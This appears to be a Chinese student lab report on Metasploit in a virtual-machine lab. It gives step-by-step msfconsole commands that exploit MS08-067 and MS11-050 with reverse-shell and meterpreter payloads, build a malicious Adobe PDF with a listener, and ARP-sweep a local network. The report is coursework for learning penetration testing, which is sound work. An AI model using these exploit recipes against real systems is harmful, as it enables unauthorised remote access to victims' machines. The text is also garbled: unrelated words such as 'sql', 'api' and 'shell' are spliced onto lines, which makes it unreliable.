本實踐目標,掌握metasploit的基本應用方式,掌握經常使用的三種攻擊方式的思路。具體須要完成(1)一個主動攻擊,如ms08_067;(2)一個針對瀏覽器的攻擊,如ms11_050;(3)一個針對客戶端的攻擊,如Adobe(4)成功應用任何一個輔助模塊。
以上四個小實踐可不限於以上示例,並要求至少有一個是和其餘全部同窗不同的,不然扣除0.5分。html
一、兩臺虛擬機,其中一臺爲kali,一臺爲windows xp sp3(英文版)。
二、在VMware中設置兩臺虛擬機網絡爲NAT模式,自動分配IP地址,以後兩臺虛擬機就能夠直接ping通。
這之間遇到了一個問題,電腦卡死了致使再打開kali的時候發現ip不對,不會調,結果偶然間發現n年前快照過一次,恢復快照後又能用了
若是ping不通,通常是ip地址不在同一個網段上,須要從新設置xp的ip地址,打開:控制面板->網絡鏈接->右擊本地鏈接選擇屬性->選擇internet協議(TCP/IP)->屬性,就能夠編輯ip地址了。例如:kali ip是192.168.23.129,xp ip設置爲:192.168.23.128。前三位同樣,最後一位隨便設置。
sql
3.在kali終端中開啓msfconsole。
4.輸入命令search ms08_067,會顯示出找到的滲透模塊,以下圖所示
5.輸入命令use exploit/windows/smb/ms08_067_netapi,進入該漏洞模塊的使用。shell
六、輸入命令show payload會顯示出有效的攻擊載荷,以下圖所示,咱們找到一個shell_reverse_tcp。
數據庫
7.命令show targets會顯示出能夠被攻擊的靶機的操做系統型號。
8.使用命令set payload generic/shell_reverse_tcp設置攻擊有效載荷。windows
九、輸入命令show options顯示咱們須要在攻擊前須要設置的數據。
api
十、輸入命令瀏覽器
set LHOST "kali Ip"安全
set RHOST "Win xp Ip
十一、輸入命令exploit開始攻擊,以下圖所示是正常攻擊成功結果
網絡
1.在kali終端中開啓msfconsole。session
二、輸入命令use windows/browser/ms11_050_mshtml_cobjectelement,進入該漏洞模塊。
三、輸入info查看信息:
4.設置對應的載荷set payload windows/meterpreter/reverse_tcp
五、show options查看須要設置的相關信息
六、設置相關信息
set LHOST ‘kali Ip’
set LPORT XXXX
set URIPATH XX
七、exploit,以下圖所示,有靶機須要訪問的ip地址:
八、在靶機IE上輸入網址,並在靶機上查看信息。
到了這裏我遇到了一個問題,就是sp3裏面的瀏覽器不是ie7,因此上圖會顯示成那樣,沒有session 1,後來我又嘗試下了不少ie7的安裝包可是實在是太卡了並且無數盜版,因此就沒有再作下去,若是換了瀏覽器理論上是能夠作出結果的我距離結果也就差一步,可是這個實驗要求上說的很清楚,「掌握metasploit的基本應用方式,掌握經常使用的三種攻擊方式的思路」,重點在掌握思路,因此我就沒有在作下去,若是扣分的話請老師在評論區裏說一下要扣分我就把這個補上。
一、兩臺虛擬機,其中一臺爲kali,一臺爲windows xp sp3。
二、設置虛擬機網絡爲NAT模式,保證兩臺虛擬機能夠ping通。
三、kali下打開顯示隱藏文件,以下圖,先打開主文件夾,在右上角打開以下圖所示位置:
4.在kali終端中開啓msfconsole。
五、輸入命令use exploit/windows/fileformat/adobe_cooltype_sing,進入該漏洞模塊的使用。
六、使用命令set payload windows/meterpreter/reverse_tcp設置攻擊有效載荷。
七、輸入命令show options顯示咱們須要在攻擊前須要設置的數據.
8.輸入命令
set FILENAME xxx.pdf
set LHOST "KALI Ip"
set LPORT xxxx
9.輸入exploit,生成pdf文件,並能夠看到pdf所在文件夾,將pdf複製到靶機裏。
10.使用命令back退出當前模塊,並使用use exploit/multi/handler新建一個監聽模塊。
十一、使用set payload windows/meterpreter/reverse_tcp創建一個反向鏈接。以下圖所示,我須要輸入命令set LPORT 5555和攻擊模塊裏的數據設置爲同樣的。
十二、使用命令exploit開始攻擊,在xp中打開pdf。以下圖:
這很明顯,攻擊成功了
1.將kali機的模式改成橋接模式,使他和主機ping通,主機鏈接的是無線網。
2.先手動建立一個msf所需的數據庫
service postgresql start
msfdb start
三、開啓msf
4.輸入命令 use auxiliary/scanner/discovery/arp_sweep進入模塊
5.show options查看須要設置的消息,其中rhost填寫本身電腦所在網段
6.使用命令,設置
set interface eth0
set RHOSTS 172.30.1.0/21
set threads 2
7.run
應該是網絡的問題,它提示沒有ipv4的地址,並且個人虛擬機提示網橋沒有正確打開,網橋崩了,求解決方案。
解決了以後有了ip
run以後結果:
當時宿舍沒人用電腦,嗯,的確是這樣。並且貌似打開防火牆的話掃描不到。
實驗指導(http://www.cnblogs.com/yayaer/p/6685527.html)
1.實驗後回答問題
(1)用本身的話解釋什麼是exploit,payload,encode.
exploit:在kali裏面進行攻擊的時候要使用的代碼是exploit
payload:目測來看是一種攻擊載體,然而我並不知道什麼事攻擊載體,感受相似於聲音藉助於空氣轉播,聲音是惡意代碼,人類是靶機,空氣就是payload
encode:直譯爲編碼,顧名思義就是把惡意代碼進行編碼而後免殺
2.實驗總結與體會
3.實踐過程記錄,體現學號,可記錄本身認爲重要的或思考過的點,不須要每步都記錄